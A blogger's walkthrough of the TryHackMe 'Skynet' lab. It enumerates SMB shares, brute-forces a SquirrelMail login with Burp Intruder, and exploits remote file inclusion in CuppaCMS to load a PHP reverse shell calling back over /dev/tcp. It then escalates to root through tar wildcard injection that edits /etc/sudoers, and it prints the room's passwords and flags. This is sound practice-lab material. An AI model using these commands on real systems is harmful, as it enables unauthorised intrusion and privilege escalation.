TryHackMe CTF: Skynet — Walkthrough

November 30, 2024
Posted in CTF, TryHackMe
November 30, 2024 Jasper

Hi! It is time to look at another CTF. This time I will be covering the Skynet CTF at TryHackMe. I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms.

Skynet CTF

Skynet CTF

Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.


Task 1 (Deploy and compromise the vulnerable machine)

Let’s get this party started.

Nmap

We will start by network mapping the machine:

nmap -sV -sC — script vuln 10.10.160.209
Port scanning the network

Look at that. A bunch of services, some vulnerabilities, as well as a web server. Let’s have a look at that first. Enter the target ip in your browser and voila:

The homepage

It seems like some kind of search engine, which does not really work. We get back to this later.

Gobuster

Now while we are enumerating let’s use gobuster to find hidden directories:

Using gobuster

This found squirrelmail, but also admin, config, and ai! We are not allowed to visit these pages though!

If you take a look back at the nmap results, you can read under port 80 that there were found some pages under /squirrel. Let’s look at it in the browser.

We found SquirrelMail!

It seems to be some kind of webmail system.

SMB Shares

Let’s enumerate some SMB shares now. While there are different tools for this task I decided to use Nmap:

nmap -sU -sS --script smb-enum-shares.nse -p 139,445 <target ip>
Enumerating SMB shares

There seem to be 4 different shares, of which 2 allow for anonymous access with the guest account (anonymous, and IPC$).

We can try logging into the smb servbice by running:

smbclient -L <ip>

Accessing the SMB through smbclient

We can access the SMB share using the following syntax:

smbclient //[IP]/[SHARE]

Followed by the following flags:

  • U [name] : to specify the user
Logging into SMB and finding files!

You can download the txt file by entering get attention.txt. Then read it:

Reading attention.txt

Hmm. Not so much info for more. Let’s look into the logs directory. There are three files there: log1, log2, and log3.txt. Download the files and read them. Only log1.txt has text in it:

Reading log1.txt

It seems like a list with passwords. We can use this to crack Miles’ password to get access to his private share on the SMB server.

First I tried to use hydra to try and hack access SMB access
(hydra -l milesdyson -P log1.txt <ip> smb), this did not lead to anything however.

Then I remember the SquirrelMail login though. Could we try and crack that? Let’s try and start Burp Suite. Intercept the post request of the login form.

Intercepting the login POST request

Right click the request and “Send to intruder”:

Sending the request to Intruder

Proceed by adding a payload (button to the right) to add a payload as the secretkey parameter:

Adding a payload the secretkey parameter

Then go into the Payloads tab and select “Simple list” as payload type. Then press the load button.

Configuring the payload

Finish by pressing Start Attack.

Attack!

Apparently, the payload with the status code 302 is the right password. We now finally have an answer on the first question:

Questions

What is Miles password for his emails?

Answer: cyborg007haloterminator

Let’s try logging in with milesdyson and cyborg007haloterminator. It worked. We got access to SquirrelMail! There are 3 emails in the inbox:

Reading private mails

Two of the contain weird text, one with binary (translated to: balls have zero to me to me to me to me to me to me to me to me to), and the other containing a similar text in English:

i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
etc.

But the “Samba Password reset” email is definitely more useful!

Samba password reset email

We can now once more try to login to Samba (smb) with milesdyson as username, and )s{A&2Z=F^n_E.B` as password.

I had a few issues here. Since the password has many special characters I could not just enter the smbclient command with the -U flag for username and -P flag for password. Instead I had to make a txt file with the username and password like so:

Logging into SMB with milesdyson’s initials

I can then login using the -A command and passing the auth.txt file containing the username and password. Now we have access!

Let’s look at the file list:

A lot of machine learning books!

A lot of books about machine learning! But also a notes directory. Let’s move into there.

A lot of notes, but also a important text file.

Lot’s of machine learning notes again. But there is a important.txt file as well. Let’s download it and read it:

Reading important.txt

Hmm, a beta CMS. Sure sounds like the answer we were looking for.

What is the hidden directory?

Answer: 45kra24zxs28v3yd

We can answer the next question as well.

What is the vulnerability called when you can include a remote file for malicious purposes?

If you are in a doubt, just google “remote file vulnerability”.

Answer: remote file inclusion

Let’s visit the CMS in the browser:

Found the beta CMS!

But what now? Let’s use gobuster again to find more pages.

gobuster dir --url http://<ip>/45kra24zxs28v3yd/ --wordlist /usr/share/wordlists/dirbuster/direcctory-list-2.3-medium.txt
Using gobuster on the CMS

An administrator page, excellent.

We found the administrator login page!

I figure it is time to look for some vulnerabilities on this CuppaCMS system.

ExploitDB has the following info:

Alternatively you can use searchsploit in the terminal:

Using searchsploit

The previous question was about remote file inclusion, so I am pretty sure we are on the right way. The exploit is related to the fact that the CMS shows an alert box which includes the text of a parameter. We can decide what to insert as parameter, which gives us the possibility to get information from the web server.

When we visit the following url in the browser:

http://10.10.16.31/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

We get shown the contents of the passwd file:

Reading etc/passwd through remote file inclusion

We can also do this with curl in the browser:

curl -s — data-urlencode urlConfig=../../../../../…../../../../../../etc/passwd

http://10.10.16.31/45kra24zxs28v3yd/administrlerts/alertConfigField.php

?

We can unfortunately not get the shadow file like this 🙁 Otherwise we could have cracked it and gain access through SSH!

Let’s try including a php reverse shell script so that we can gain access!

This takes 3 steps:

  1. Create a reverse shell script (PHP).
  2. Start a simple Python web server
  3. Download the script though the RFI vulnerability

Let’s get going. I found a simple PHP reverse shell one here:

https://highon.coffee/blog/reverse-shell-cheat-sheet/

<?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/”ATTACKING IP”/443 0>&1’”);?>

Save it to a file after making sure you edited the attacking ip.

Now start at simple web server:

python -m http.server

Before making the target machine run the reverse shell we need to setup a netcat listener on our attacking machine:

nc -lvnp 443

Finally, run the following in the browser:

http://<target ip>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<attacker ip>:8000/shell.php
Serving the shell.php reverse shell

We got access!

Gaining access!

Got to the home directory, and you can see a home directory for the user milesdyson:

Finding the user flag.

What is the user flag?

Answer: 7ce5c2109a40f958099283600a9ae807

It’s time for the final question.

We need to more privileges to gain access to the root flag, and the first problem is that we have a dumb shell! We make obtain an interactive shell by doing the following:

  • Run: python -c ‘import pty; pty.spawn(“/bin/sh”)’
  • Background the process
  • Run stty raw -echo on our host
  • Return back to our reverse shell by writing fg

Now you should have an interactive shell.

There are a lot of place to look at now.

We could look at the user home directory, list processes, checkout the .ssh keys, look at the shell history, cron jobs, listing user privileges, and more!

But we lack privileges for a lot of those options. If we look the home directory of milesdyson however, we can see an interesting file: backup.sh.

Backup files

This shell script simple contains the following:

Backup shell script

If we look at the cronjobs in the /etc/crontab file we can see that the script is run every minute.

Contab file

I have to be honest, this last part was over my head. Also because I did not do any rooms on privilege escalation yet! I got inspired from this walkthrough: https://medium.com/azkrath/tryhackme-walkthrough-skynet-69399702ee5a

What you have to do is run the following in the /var/www/html folder (which is being backed up).

echo ‘echo “www-data ALL=(root) NOPASSWD: ALL” >> /etc/sudoers’ > sudo.sh
touch “/var/www/html/ — checkpoint-action=exec=sh sudo.sh”
touch “/var/www/html/ — checkpoint=1”
Wildcard injection to get root access

The weakness is related to the tar command, which is vulnerable to wildcard injection. This makes it possible to add a checkpoint-action which can execute the sudo script (first line), which edits the sudoers file and gives us root access.

You can read more on the vulnerability here:

Pretty complicated stuff for a beginner, but hey, we got a bit smarter!

What is the root flag?

We found the root flag!

Answer: 3f0372db24753accc7179a282cd6a949


We are done! This was a fun CTF, and we used a lot of common tools. We have gotten more practice with nmap, gobuster, smb, remote file inclusion, and privilege escalation, and more! I hope you had fun, and learned a bit as well!


Like my articles?

You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

Leave a Reply

Your email address will not be published. Required fields are marked *